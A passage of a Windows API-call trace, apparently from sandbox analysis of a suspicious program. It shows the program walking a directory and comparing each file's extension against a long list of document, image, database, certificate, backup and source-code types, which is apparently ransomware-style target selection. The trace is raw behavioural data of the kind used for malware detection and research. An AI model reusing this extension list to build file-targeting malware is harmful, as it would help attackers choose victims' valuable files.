lstrlenW (lpString=".as") returned 3 [0167.800] lstrcmpiW (lpString1=".as", lpString2="rtf") returned -1 [0167.800] lstrlenW (lpString=".asa") returned 4 [0167.800] lstrcmpiW (lpString1=".asa", lpString2=".rtf") returned -1 [0167.800] lstrlenW (lpString=".asc") returned 4 [0167.800] lstrcmpiW (lpString1=".asc", lpString2=".rtf") returned -1 [0167.800] lstrlenW (lpString=".ascx") returned 5 [0167.800] lstrcmpiW (lpString1=".ascx", lpString2="a.rtf") returned -1 [0167.800] lstrlenW (lpString=".asm") returned 4 [0167.800] lstrcmpiW (lpString1=".asm", lpString2=".rtf") returned -1 [0167.800] lstrlenW (lpString=".asmx") returned 5 [0167.800] lstrcmpiW (lpString1=".asmx", lpString2="a.rtf") returned -1 [0167.800] lstrlenW (lpString=".asp") returned 4 [0167.800] lstrcmpiW (lpString1=".asp", lpString2=".rtf") returned -1 [0167.800] lstrlenW (lpString=".aspx") returned 5 [0167.800] lstrcmpiW (lpString1=".aspx", lpString2="a.rtf") returned -1 [0167.800] lstrlenW (lpString=".asr") returned 4 [0167.800] lstrcmpiW (lpString1=".asr", lpString2=".rtf") returned -1 [0167.801] lstrlenW (lpString=".asx") returned 4 [0167.801] lstrcmpiW (lpString1=".asx", lpString2=".rtf") returned -1 [0167.801] lstrlenW (lpString=".avi") returned 4 [0167.801] lstrcmpiW (lpString1=".avi", lpString2=".rtf") returned -1 [0167.801] lstrlenW (lpString=".avs") returned 4 [0167.801] lstrcmpiW (lpString1=".avs", lpString2=".rtf") returned -1 [0167.801] lstrlenW (lpString=".backup") returned 7 [0167.801] lstrcmpiW (lpString1=".backup", lpString2="ula.rtf") returned -1 [0167.801] lstrlenW (lpString=".bak") returned 4 [0167.801] lstrcmpiW (lpString1=".bak", lpString2=".rtf") returned -1 [0167.801] lstrlenW (lpString=".bay") returned 4 [0167.801] lstrcmpiW (lpString1=".bay", lpString2=".rtf") returned -1 [0167.801] lstrlenW (lpString=".bd") returned 3 [0167.801] lstrcmpiW (lpString1=".bd", lpString2="rtf") returned -1 [0167.801] lstrlenW (lpString=".bin") returned 4 [0167.801] lstrcmpiW (lpString1=".bin", lpString2=".rtf") returned -1 [0167.801] lstrlenW (lpString=".bmp") returned 4 [0167.801] lstrcmpiW (lpString1=".bmp", lpString2=".rtf") returned -1 [0167.801] lstrlenW (lpString=".bz2") returned 4 [0167.801] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0167.801] lstrlenW (lpString=".c") returned 2 [0167.801] lstrcmpiW (lpString1=".c", lpString2="tf") returned -1 [0167.801] lstrlenW (lpString=".cdr") returned 4 [0167.801] lstrcmpiW (lpString1=".cdr", lpString2=".rtf") returned -1 [0167.801] lstrlenW (lpString=".cer") returned 4 [0167.801] lstrcmpiW (lpString1=".cer", lpString2=".rtf") returned -1 [0167.801] lstrlenW (lpString=".cf") returned 3 [0167.801] lstrcmpiW (lpString1=".cf", lpString2="rtf") returned -1 [0167.801] lstrlenW (lpString=".cfc") returned 4 [0167.801] lstrcmpiW (lpString1=".cfc", lpString2=".rtf") returned -1 [0167.801] lstrlenW (lpString=".cfm") returned 4 [0167.801] lstrcmpiW (lpString1=".cfm", lpString2=".rtf") returned -1 [0167.801] lstrlenW (lpString=".cfml") returned 5 [0167.801] lstrcmpiW (lpString1=".cfml", lpString2="a.rtf") returned -1 [0167.802] lstrlenW (lpString=".cfu") returned 4 [0167.802] lstrcmpiW (lpString1=".cfu", lpString2=".rtf") returned -1 [0167.802] lstrlenW (lpString=".chm") returned 4 [0167.802] lstrcmpiW (lpString1=".chm", lpString2=".rtf") returned -1 [0167.802] lstrlenW (lpString=".cin") returned 4 [0167.802] lstrcmpiW (lpString1=".cin", lpString2=".rtf") returned -1 [0167.802] lstrlenW (lpString=".class") returned 6 [0167.802] lstrcmpiW (lpString1=".class", lpString2="la.rtf") returned -1 [0167.802] lstrlenW (lpString=".clx") returned 4 [0167.802] lstrcmpiW (lpString1=".clx", lpString2=".rtf") returned -1 [0167.802] lstrlenW (lpString=".config") returned 7 [0167.802] lstrcmpiW (lpString1=".config", lpString2="ula.rtf") returned -1 [0167.802] lstrlenW (lpString=".cpp") returned 4 [0167.802] lstrcmpiW (lpString1=".cpp", lpString2=".rtf") returned -1 [0167.802] lstrlenW (lpString=".cr2") returned 4 [0167.802] lstrcmpiW (lpString1=".cr2", lpString2=".rtf") returned -1 [0167.802] lstrlenW (lpString=".crt") returned 4 [0167.802] lstrcmpiW (lpString1=".crt", lpString2=".rtf") returned -1 [0167.802] lstrlenW (lpString=".crw") returned 4 [0167.802] lstrcmpiW (lpString1=".crw", lpString2=".rtf") returned -1 [0167.802] lstrlenW (lpString=".cs") returned 3 [0167.802] lstrcmpiW (lpString1=".cs", lpString2="rtf") returned -1 [0167.802] lstrlenW (lpString=".css") returned 4 [0167.802] lstrcmpiW (lpString1=".css", lpString2=".rtf") returned -1 [0167.802] lstrlenW (lpString=".csv") returned 4 [0167.802] lstrcmpiW (lpString1=".csv", lpString2=".rtf") returned -1 [0167.802] lstrlenW (lpString=".cub") returned 4 [0167.802] lstrcmpiW (lpString1=".cub", lpString2=".rtf") returned -1 [0167.802] lstrlenW (lpString=".dae") returned 4 [0167.802] lstrcmpiW (lpString1=".dae", lpString2=".rtf") returned -1 [0167.802] lstrlenW (lpString=".dat") returned 4 [0167.802] lstrcmpiW (lpString1=".dat", lpString2=".rtf") returned -1 [0167.802] lstrlenW (lpString=".db") returned 3 [0167.802] lstrcmpiW (lpString1=".db", lpString2="rtf") returned -1 [0167.802] lstrlenW (lpString=".dbf") returned 4 [0167.803] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0167.803] lstrlenW (lpString=".dbx") returned 4 [0167.803] lstrcmpiW (lpString1=".dbx", lpString2=".rtf") returned -1 [0167.803] lstrlenW (lpString=".dc3") returned 4 [0167.803] lstrcmpiW (lpString1=".dc3", lpString2=".rtf") returned -1 [0167.803] lstrlenW (lpString=".dcm") returned 4 [0167.803] lstrcmpiW (lpString1=".dcm", lpString2=".rtf") returned -1 [0167.803] lstrlenW (lpString=".dcr") returned 4 [0167.803] lstrcmpiW (lpString1=".dcr", lpString2=".rtf") returned -1 [0167.803] lstrlenW (lpString=".der") returned 4 [0167.803] lstrcmpiW (lpString1=".der", lpString2=".rtf") returned -1 [0167.803] lstrlenW (lpString=".dib") returned 4 [0167.803] lstrcmpiW (lpString1=".dib", lpString2=".rtf") returned -1 [0167.803] lstrlenW (lpString=".dic") returned 4 [0167.803] lstrcmpiW (lpString1=".dic", lpString2=".rtf") returned -1 [0167.803] lstrlenW (lpString=".dif") returned 4 [0167.803] lstrcmpiW (lpString1=".dif", lpString2=".rtf") returned -1 [0167.803] lstrlenW (lpString=".divx") returned 5 [0167.803] lstrcmpiW (lpString1=".divx", lpString2="a.rtf") returned -1 [0167.803] lstrlenW (lpString=".djvu") returned 5 [0167.803] lstrcmpiW (lpString1=".djvu", lpString2="a.rtf") returned -1 [0167.803] lstrlenW (lpString=".dng") returned 4 [0167.803] lstrcmpiW (lpString1=".dng", lpString2=".rtf") returned -1 [0167.803] lstrlenW (lpString=".doc") returned 4 [0167.803] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0167.803] lstrlenW (lpString=".docm") returned 5 [0167.803] lstrcmpiW (lpString1=".docm", lpString2="a.rtf") returned -1 [0167.803] lstrlenW (lpString=".docx") returned 5 [0167.803] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0167.803] lstrlenW (lpString=".dot") returned 4 [0167.803] lstrcmpiW (lpString1=".dot", lpString2=".rtf") returned -1 [0167.803] lstrlenW (lpString=".dotm") returned 5 [0167.803] lstrcmpiW (lpString1=".dotm", lpString2="a.rtf") returned -1 [0167.803] lstrlenW (lpString=".dotx") returned 5 [0167.803] lstrcmpiW (lpString1=".dotx", lpString2="a.rtf") returned -1 [0167.803] lstrlenW (lpString=".dpx") returned 4 [0167.804] lstrcmpiW (lpString1=".dpx", lpString2=".rtf") returned -1 [0167.804] lstrlenW (lpString=".dqy") returned 4 [0167.804] lstrcmpiW (lpString1=".dqy", lpString2=".rtf") returned -1 [0167.804] lstrlenW (lpString=".dsn") returned 4 [0167.804] lstrcmpiW (lpString1=".dsn", lpString2=".rtf") returned -1 [0167.804] lstrlenW (lpString=".dt") returned 3 [0167.804] lstrcmpiW (lpString1=".dt", lpString2="rtf") returned -1 [0167.804] lstrlenW (lpString=".dtd") returned 4 [0167.804] lstrcmpiW (lpString1=".dtd", lpString2=".rtf") returned -1 [0167.804] lstrlenW (lpString=".dwg") returned 4 [0167.804] lstrcmpiW (lpString1=".dwg", lpString2=".rtf") returned -1 [0167.804] lstrlenW (lpString=".dwt") returned 4 [0167.804] lstrcmpiW (lpString1=".dwt", lpString2=".rtf") returned -1 [0167.804] lstrlenW (lpString=".dx") returned 3 [0167.804] lstrcmpiW (lpString1=".dx", lpString2="rtf") returned -1 [0167.804] lstrlenW (lpString=".dxf") returned 4 [0167.804] lstrcmpiW (lpString1=".dxf", lpString2=".rtf") returned -1 [0167.804] lstrlenW (lpString=".edml") returned 5 [0167.804] lstrcmpiW (lpString1=".edml", lpString2="a.rtf") returned -1 [0167.804] lstrlenW (lpString=".efd") returned 4 [0167.804] lstrcmpiW (lpString1=".efd", lpString2=".rtf") returned -1 [0167.804] lstrlenW (lpString=".elf") returned 4 [0167.804] lstrcmpiW (lpString1=".elf", lpString2=".rtf") returned -1 [0167.804] lstrlenW (lpString=".emf") returned 4 [0167.804] lstrcmpiW (lpString1=".emf", lpString2=".rtf") returned -1 [0167.804] lstrlenW (lpString=".emz") returned 4 [0167.804] lstrcmpiW (lpString1=".emz", lpString2=".rtf") returned -1 [0167.804] lstrlenW (lpString=".epf") returned 4 [0167.804] lstrcmpiW (lpString1=".epf", lpString2=".rtf") returned -1 [0167.804] lstrlenW (lpString=".eps") returned 4 [0167.804] lstrcmpiW (lpString1=".eps", lpString2=".rtf") returned -1 [0167.804] lstrlenW (lpString=".epsf") returned 5 [0167.804] lstrcmpiW (lpString1=".epsf", lpString2="a.rtf") returned -1 [0167.804] lstrlenW (lpString=".epsp") returned 5 [0167.804] lstrcmpiW (lpString1=".epsp", lpString2="a.rtf") returned -1 [0167.804] lstrlenW (lpString=".erf") returned 4 [0167.804] lstrcmpiW (lpString1=".erf", lpString2=".rtf") returned -1 [0167.805] lstrlenW (lpString=".exr") returned 4 [0167.805] lstrcmpiW (lpString1=".exr", lpString2=".rtf") returned -1 [0167.805] lstrlenW (lpString=".f4v") returned 4 [0167.805] lstrcmpiW (lpString1=".f4v", lpString2=".rtf") returned -1 [0167.805] lstrlenW (lpString=".fido") returned 5 [0167.805] lstrcmpiW (lpString1=".fido", lpString2="a.rtf") returned -1 [0167.805] lstrlenW (lpString=".flm") returned 4 [0167.805] lstrcmpiW (lpString1=".flm", lpString2=".rtf") returned -1 [0167.805] lstrlenW (lpString=".flv") returned 4 [0167.805] lstrcmpiW (lpString1=".flv", lpString2=".rtf") returned -1 [0167.805] lstrlenW (lpString=".frm") returned 4 [0167.805] lstrcmpiW (lpString1=".frm", lpString2=".rtf") returned -1 [0167.805] lstrlenW (lpString=".fxg") returned 4 [0167.805] lstrcmpiW (lpString1=".fxg", lpString2=".rtf") returned -1 [0167.805] lstrlenW (lpString=".geo") returned 4 [0167.805] lstrcmpiW (lpString1=".geo", lpString2=".rtf") returned -1 [0167.805] lstrlenW (lpString=".gif") returned 4 [0167.805] lstrcmpiW (lpString1=".gif", lpString2=".rtf") returned -1 [0167.805] lstrlenW (lpString=".grs") returned 4 [0167.805] lstrcmpiW (lpString1=".grs", lpString2=".rtf") returned -1 [0167.805] lstrlenW (lpString=".gz") returned 3 [0167.805] lstrcmpiW (lpString1=".gz", lpString2="rtf") returned -1 [0167.805] lstrlenW (lpString=".h") returned 2 [0167.805] lstrcmpiW (lpString1=".h", lpString2="tf") returned -1 [0167.805] lstrlenW (lpString=".hdr") returned 4 [0167.805] lstrcmpiW (lpString1=".hdr", lpString2=".rtf") returned -1 [0167.805] lstrlenW (lpString=".hpp") returned 4 [0167.805] lstrcmpiW (lpString1=".hpp", lpString2=".rtf") returned -1 [0167.805] lstrlenW (lpString=".hta") returned 4 [0167.805] lstrcmpiW (lpString1=".hta", lpString2=".rtf") returned -1 [0167.805] lstrlenW (lpString=".htc") returned 4 [0167.805] lstrcmpiW (lpString1=".htc", lpString2=".rtf") returned -1 [0167.805] lstrlenW (lpString=".htm") returned 4 [0167.805] lstrcmpiW (lpString1=".htm", lpString2=".rtf") returned -1 [0167.805] lstrlenW (lpString=".html") returned 5 [0167.805] lstrcmpiW (lpString1=".html", lpString2="a.rtf") returned -1 [0167.806] lstrlenW (lpString=".icb") returned 4 [0167.806] lstrcmpiW (lpString1=".icb", lpString2=".rtf") returned -1 [0167.806] lstrlenW (lpString=".ics") returned 4 [0167.806] lstrcmpiW (lpString1=".ics", lpString2=".rtf") returned -1 [0167.806] lstrlenW (lpString=".iff") returned 4 [0167.806] lstrcmpiW (lpString1=".iff", lpString2=".rtf") returned -1 [0167.806] lstrlenW (lpString=".inc") returned 4 [0167.806] lstrcmpiW (lpString1=".inc", lpString2=".rtf") returned -1 [0167.806] lstrlenW (lpString=".indd") returned 5 [0167.806] lstrcmpiW (lpString1=".indd", lpString2="a.rtf") returned -1 [0167.806] lstrlenW (lpString=".ini") returned 4 [0167.806] lstrcmpiW (lpString1=".ini", lpString2=".rtf") returned -1 [0167.806] lstrlenW (lpString=".iqy") returned 4 [0167.806] lstrcmpiW (lpString1=".iqy", lpString2=".rtf") returned -1 [0167.806] lstrlenW (lpString=".j2c") returned 4 [0167.806] lstrcmpiW (lpString1=".j2c", lpString2=".rtf") returned -1 [0167.806] lstrlenW (lpString=".j2k") returned 4 [0167.806] lstrcmpiW (lpString1=".j2k", lpString2=".rtf") returned -1 [0167.806] lstrlenW (lpString=".java") returned 5 [0167.806] lstrcmpiW (lpString1=".java", lpString2="a.rtf") returned -1 [0167.806] lstrlenW (lpString=".jp2") returned 4 [0167.806] lstrcmpiW (lpString1=".jp2", lpString2=".rtf") returned -1 [0167.806] lstrlenW (lpString=".jpc") returned 4 [0167.806] lstrcmpiW (lpString1=".jpc", lpString2=".rtf") returned -1 [0167.806] lstrlenW (lpString=".jpe") returned 4 [0167.806] lstrcmpiW (lpString1=".jpe", lpString2=".rtf") returned -1 [0167.806] lstrlenW (lpString=".jpeg") returned 5 [0167.806] lstrcmpiW (lpString1=".jpeg", lpString2="a.rtf") returned -1 [0167.806] lstrlenW (lpString=".jpf") returned 4 [0167.806] lstrcmpiW (lpString1=".jpf", lpString2=".rtf") returned -1 [0167.807] lstrlenW (lpString=".jpg") returned 4 [0167.807] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0167.807] lstrlenW (lpString=".jpx") returned 4 [0167.807] lstrcmpiW (lpString1=".jpx", lpString2=".rtf") returned -1 [0167.807] lstrlenW (lpString=".js") returned 3 [0167.807] lstrcmpiW (lpString1=".js", lpString2="rtf") returned -1 [0167.807] lstrlenW (lpString=".jsf") returned 4 [0167.807] lstrcmpiW (lpString1=".jsf", lpString2=".rtf") returned -1 [0167.807] lstrlenW (lpString=".json") returned 5 [0167.807] lstrcmpiW (lpString1=".json", lpString2="a.rtf") returned -1 [0167.807] lstrlenW (lpString=".jsp") returned 4 [0167.807] lstrcmpiW (lpString1=".jsp", lpString2=".rtf") returned -1 [0167.807] lstrlenW (lpString=".kdc") returned 4 [0167.807] lstrcmpiW (lpString1=".kdc", lpString2=".rtf") returned -1 [0167.807] lstrlenW (lpString=".kmz") returned 4 [0167.807] lstrcmpiW (lpString1=".kmz", lpString2=".rtf") returned -1 [0167.807] lstrlenW (lpString=".kwm") returned 4 [0167.807] lstrcmpiW (lpString1=".kwm", lpString2=".rtf") returned -1 [0167.807] lstrlenW (lpString=".lasso") returned 6 [0167.807] lstrcmpiW (lpString1=".lasso", lpString2="la.rtf") returned -1 [0167.807] lstrlenW (lpString=".lbi") returned 4 [0167.807] lstrcmpiW (lpString1=".lbi", lpString2=".rtf") returned -1 [0167.807] lstrlenW (lpString=".lgf") returned 4 [0167.807] lstrcmpiW (lpString1=".lgf", lpString2=".rtf") returned -1 [0167.807] lstrlenW (lpString=".lgp") returned 4 [0167.807] lstrcmpiW (lpString1=".lgp", lpString2=".rtf") returned -1 [0167.807] lstrlenW (lpString=".log") returned 4 [0167.807] lstrcmpiW (lpString1=".log", lpString2=".rtf") returned -1 [0167.807] lstrlenW (lpString=".m1v") returned 4 [0167.807] lstrcmpiW (lpString1=".m1v", lpString2=".rtf") returned -1 [0167.807] lstrlenW (lpString=".m4a") returned 4 [0167.807] lstrcmpiW (lpString1=".m4a", lpString2=".rtf") returned -1 [0167.807] lstrlenW (lpString=".m4v") returned 4 [0167.807] lstrcmpiW (lpString1=".m4v", lpString2=".rtf") returned -1 [0167.807] lstrlenW (lpString=".max") returned 4 [0167.807] lstrcmpiW (lpString1=".max", lpString2=".rtf") returned -1 [0167.808] lstrlenW (lpString=".md") returned 3 [0167.808] lstrcmpiW (lpString1=".md", lpString2="rtf") returned -1 [0167.808] lstrlenW (lpString=".mda") returned 4 [0167.808] lstrcmpiW (lpString1=".mda", lpString2=".rtf") returned -1 [0167.808] lstrlenW (lpString=".mdb") returned 4 [0167.808] lstrcmpiW (lpString1=".mdb", lpString2=".rtf") returned -1 [0167.808] lstrlenW (lpString=".mde") returned 4 [0167.808] lstrcmpiW (lpString1=".mde", lpString2=".rtf") returned -1 [0167.808] lstrlenW (lpString=".mdf") returned 4 [0167.808] lstrcmpiW (lpString1=".mdf", lpString2=".rtf") returned -1 [0167.808] lstrlenW (lpString=".mdw") returned 4 [0167.808] lstrcmpiW (lpString1=".mdw", lpString2=".rtf") returned -1 [0167.808] lstrlenW (lpString=".mef") returned 4 [0167.808] lstrcmpiW (lpString1=".mef", lpString2=".rtf") returned -1 [0167.808] lstrlenW (lpString=".mft") returned 4 [0167.808] lstrcmpiW (lpString1=".mft", lpString2=".rtf") returned -1 [0167.808] lstrlenW (lpString=".mfw") returned 4 [0167.808] lstrcmpiW (lpString1=".mfw", lpString2=".rtf") returned -1 [0167.808] lstrlenW (lpString=".mht") returned 4 [0167.808] lstrcmpiW (lpString1=".mht", lpString2=".rtf") returned -1 [0167.808] lstrlenW (lpString=".mhtml") returned 6 [0167.808] lstrcmpiW (lpString1=".mhtml", lpString2="la.rtf") returned -1 [0167.808] lstrlenW (lpString=".mka") returned 4 [0167.808] lstrcmpiW (lpString1=".mka", lpString2=".rtf") returned -1 [0167.808] lstrlenW (lpString=".mkidx") returned 6 [0167.808] lstrcmpiW (lpString1=".mkidx", lpString2="la.rtf") returned -1 [0167.808] lstrlenW (lpString=".mkv") returned 4 [0167.808] lstrcmpiW (lpString1=".mkv", lpString2=".rtf") returned -1 [0167.808] lstrlenW (lpString=".mos") returned 4 [0167.808] lstrcmpiW (lpString1=".mos", lpString2=".rtf") returned -1 [0167.808] lstrlenW (lpString=".mov") returned 4 [0167.808] lstrcmpiW (lpString1=".mov", lpString2=".rtf") returned -1 [0167.808] lstrlenW (lpString=".mp3") returned 4 [0167.808] lstrcmpiW (lpString1=".mp3", lpString2=".rtf") returned -1 [0167.808] lstrlenW (lpString=".mp4") returned 4 [0167.808] lstrcmpiW (lpString1=".mp4", lpString2=".rtf") returned -1 [0167.809] lstrlenW (lpString=".mpeg") returned 5 [0167.809] lstrcmpiW (lpString1=".mpeg", lpString2="a.rtf") returned -1 [0167.809] lstrlenW (lpString=".mpg") returned 4 [0167.809] lstrcmpiW (lpString1=".mpg", lpString2=".rtf") returned -1 [0167.809] lstrlenW (lpString=".mpv") returned 4 [0167.809] lstrcmpiW (lpString1=".mpv", lpString2=".rtf") returned -1 [0167.809] lstrlenW (lpString=".mrw") returned 4 [0167.809] lstrcmpiW (lpString1=".mrw", lpString2=".rtf") returned -1 [0167.809] lstrlenW (lpString=".msg") returned 4 [0167.809] lstrcmpiW (lpString1=".msg", lpString2=".rtf") returned -1 [0167.809] lstrlenW (lpString=".mxl") returned 4 [0167.809] lstrcmpiW (lpString1=".mxl", lpString2=".rtf") returned -1 [0167.809] lstrlenW (lpString=".myd") returned 4 [0167.809] lstrcmpiW (lpString1=".myd", lpString2=".rtf") returned -1 [0167.809] lstrlenW (lpString=".myi") returned 4 [0167.809] lstrcmpiW (lpString1=".myi", lpString2=".rtf") returned -1 [0167.809] lstrlenW (lpString=".nef") returned 4 [0167.809] lstrcmpiW (lpString1=".nef", lpString2=".rtf") returned -1 [0167.809] lstrlenW (lpString=".nrw") returned 4 [0167.809] lstrcmpiW (lpString1=".nrw", lpString2=".rtf") returned -1 [0167.809] lstrlenW (lpString=".obj") returned 4 [0167.809] lstrcmpiW (lpString1=".obj", lpString2=".rtf") returned -1 [0167.809] lstrlenW (lpString=".odb") returned 4 [0167.809] lstrcmpiW (lpString1=".odb", lpString2=".rtf") returned -1 [0167.809] lstrlenW (lpString=".odc") returned 4 [0167.809] lstrcmpiW (lpString1=".odc", lpString2=".rtf") returned -1 [0167.809] lstrlenW (lpString=".odm") returned 4 [0167.810] lstrcmpiW (lpString1=".odm", lpString2=".rtf") returned -1 [0167.810] lstrlenW (lpString=".odp") returned 4 [0167.810] lstrcmpiW (lpString1=".odp", lpString2=".rtf") returned -1 [0167.810] lstrlenW (lpString=".ods") returned 4 [0167.810] lstrcmpiW (lpString1=".ods", lpString2=".rtf") returned -1 [0167.810] lstrlenW (lpString=".oft") returned 4 [0167.810] lstrcmpiW (lpString1=".oft", lpString2=".rtf") returned -1 [0167.810] lstrlenW (lpString=".one") returned 4 [0167.810] lstrcmpiW (lpString1=".one", lpString2=".rtf") returned -1 [0167.810] lstrlenW (lpString=".onepkg") returned 7 [0167.810] lstrcmpiW (lpString1=".onepkg", lpString2="ula.rtf") returned -1 [0167.810] lstrlenW (lpString=".onetoc2") returned 8 [0167.810] lstrcmpiW (lpString1=".onetoc2", lpString2="eula.rtf") returned -1 [0167.810] lstrlenW (lpString=".opt") returned 4 [0167.810] lstrcmpiW (lpString1=".opt", lpString2=".rtf") returned -1 [0167.810] lstrlenW (lpString=".oqy") returned 4 [0167.810] lstrcmpiW (lpString1=".oqy", lpString2=".rtf") returned -1 [0167.810] lstrlenW (lpString=".orf") returned 4 [0167.810] lstrcmpiW (lpString1=".orf", lpString2=".rtf") returned -1 [0167.810] lstrlenW (lpString=".p12") returned 4 [0167.810] lstrcmpiW (lpString1=".p12", lpString2=".rtf") returned -1 [0167.810] lstrlenW (lpString=".p7b") returned 4 [0167.810] lstrcmpiW (lpString1=".p7b", lpString2=".rtf") returned -1 [0167.810] lstrlenW (lpString=".p7c") returned 4 [0167.810] lstrcmpiW (lpString1=".p7c", lpString2=".rtf") returned -1 [0167.810] lstrlenW (lpString=".pam") returned 4 [0167.810] lstrcmpiW (lpString1=".pam", lpString2=".rtf") returned -1 [0167.810] lstrlenW (lpString=".pbm") returned 4 [0167.810] lstrcmpiW (lpString1=".pbm", lpString2=".rtf") returned -1 [0167.810] lstrlenW (lpString=".pct") returned 4 [0167.810] lstrcmpiW (lpString1=".pct", lpString2=".rtf") returned -1 [0167.810] lstrlenW (lpString=".pcx") returned 4 [0167.810] lstrcmpiW (lpString1=".pcx", lpString2=".rtf") returned -1 [0167.810] lstrlenW (lpString=".pdd") returned 4 [0167.810] lstrcmpiW (lpString1=".pdd", lpString2=".rtf") returned -1 [0167.810] lstrlenW (lpString=".pdf") returned 4 [0167.811] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0167.811] lstrlenW (lpString=".pdp") returned 4 [0167.811] lstrcmpiW (lpString1=".pdp", lpString2=".rtf") returned -1 [0167.811] lstrlenW (lpString=".pef") returned 4 [0167.811] lstrcmpiW (lpString1=".pef", lpString2=".rtf") returned -1 [0167.811] lstrlenW (lpString=".pem") returned 4 [0167.811] lstrcmpiW (lpString1=".pem", lpString2=".rtf") returned -1 [0167.811] lstrlenW (lpString=".pff") returned 4 [0167.811] lstrcmpiW (lpString1=".pff", lpString2=".rtf") returned -1 [0167.811] lstrlenW (lpString=".pfm") returned 4 [0167.811] lstrcmpiW (lpString1=".pfm", lpString2=".rtf") returned -1 [0167.811] lstrlenW (lpString=".pfx") returned 4 [0167.811] lstrcmpiW (lpString1=".pfx", lpString2=".rtf") returned -1 [0167.811] lstrlenW (lpString=".pgm") returned 4 [0167.811] lstrcmpiW (lpString1=".pgm", lpString2=".rtf") returned -1 [0167.811] lstrlenW (lpString=".php") returned 4 [0167.811] lstrcmpiW (lpString1=".php", lpString2=".rtf") returned -1 [0167.811] lstrlenW (lpString=".php3") returned 5 [0167.811] lstrcmpiW (lpString1=".php3", lpString2="a.rtf") returned -1 [0167.811] lstrlenW (lpString=".php4") returned 5 [0167.811] lstrcmpiW (lpString1=".php4", lpString2="a.rtf") returned -1 [0167.811] lstrlenW (lpString=".php5") returned 5 [0167.811] lstrcmpiW (lpString1=".php5", lpString2="a.rtf") returned -1 [0167.811] lstrlenW (lpString=".phtml") returned 6 [0167.811] lstrcmpiW (lpString1=".phtml", lpString2="la.rtf") returned -1 [0167.811] lstrlenW (lpString=".pict") returned 5 [0167.811] lstrcmpiW (lpString1=".pict", lpString2="a.rtf") returned -1 [0167.811] lstrlenW (lpString=".pl") returned 3 [0167.811] lstrcmpiW (lpString1=".pl", lpString2="rtf") returned -1 [0167.811] lstrlenW (lpString=".pls") returned 4 [0167.811] lstrcmpiW (lpString1=".pls", lpString2=".rtf") returned -1 [0167.811] lstrlenW (lpString=".pm") returned 3 [0167.811] lstrcmpiW (lpString1=".pm", lpString2="rtf") returned -1 [0167.811] lstrlenW (lpString=".png") returned 4 [0167.811] lstrcmpiW (lpString1=".png", lpString2=".rtf") returned -1 [0167.812] lstrlenW (lpString=".pnm") returned 4 [0167.812] lstrcmpiW (lpString1=".pnm", lpString2=".rtf") returned -1 [0167.812] lstrlenW (lpString=".pot") returned 4 [0167.812] lstrcmpiW (lpString1=".pot", lpString2=".rtf") returned -1 [0167.812] lstrlenW (lpString=".potm") returned 5 [0167.812] lstrcmpiW (lpString1=".potm", lpString2="a.rtf") returned -1 [0167.812] lstrlenW (lpString=".potx") returned 5 [0167.812] lstrcmpiW (lpString1=".potx", lpString2="a.rtf") returned -1 [0167.812] lstrlenW (lpString=".ppa") returned 4 [0167.812] lstrcmpiW (lpString1=".ppa", lpString2=".rtf") returned -1 [0167.812] lstrlenW (lpString=".ppam") returned 5 [0167.812] lstrcmpiW (lpString1=".ppam", lpString2="a.rtf") returned -1 [0167.812] lstrlenW (lpString=".ppm") returned 4 [0167.812] lstrcmpiW (lpString1=".ppm", lpString2=".rtf") returned -1 [0167.812] lstrlenW (lpString=".pps") returned 4 [0167.812] lstrcmpiW (lpString1=".pps", lpString2=".rtf") returned -1 [0167.812] lstrlenW (lpString=".ppsm") returned 5 [0167.812] lstrcmpiW (lpString1=".ppsm", lpString2="a.rtf") returned -1 [0167.812] lstrlenW (lpString=".ppt") returned 4 [0167.812] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0167.812] lstrlenW (lpString=".pptm") returned 5 [0167.812] lstrcmpiW (lpString1=".pptm", lpString2="a.rtf") returned -1 [0167.812] lstrlenW (lpString=".pptx") returned 5 [0167.812] lstrcmpiW (lpString1=".pptx", lpString2="a.rtf") returned -1 [0167.812] lstrlenW (lpString=".prn") returned 4 [0167.812] lstrcmpiW (lpString1=".prn", lpString2=".rtf") returned -1 [0167.812] lstrlenW (lpString=".ps") returned 3 [0167.812] lstrcmpiW (lpString1=".ps", lpString2="rtf") returned -1 [0167.812] lstrlenW (lpString=".psb") returned 4 [0167.812] lstrcmpiW (lpString1=".psb", lpString2=".rtf") returned -1 [0167.812] lstrlenW (lpString=".psd") returned 4 [0167.812] lstrcmpiW (lpString1=".psd", lpString2=".rtf") returned -1 [0167.812] lstrlenW (lpString=".pst") returned 4 [0167.812] lstrcmpiW (lpString1=".pst", lpString2=".rtf") returned -1 [0167.812] lstrlenW (lpString=".ptx") returned 4 [0167.812] lstrcmpiW (lpString1=".ptx", lpString2=".rtf") returned -1 [0167.813] lstrlenW (lpString=".pub") returned 4 [0167.813] lstrcmpiW (lpString1=".pub", lpString2=".rtf") returned -1 [0167.813] lstrlenW (lpString=".pwm") returned 4 [0167.813] lstrcmpiW (lpString1=".pwm", lpString2=".rtf") returned -1 [0167.813] lstrlenW (lpString=".pxr") returned 4 [0167.813] lstrcmpiW (lpString1=".pxr", lpString2=".rtf") returned -1 [0167.813] lstrlenW (lpString=".py") returned 3 [0167.813] lstrcmpiW (lpString1=".py", lpString2="rtf") returned -1 [0167.813] lstrlenW (lpString=".qt") returned 3 [0167.813] lstrcmpiW (lpString1=".qt", lpString2="rtf") returned -1 [0167.813] FindNextFileW (in: hFindFile=0x801ed8, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x121e6, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0167.813] FindNextFileW (in: hFindFile=0x801ed8, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, 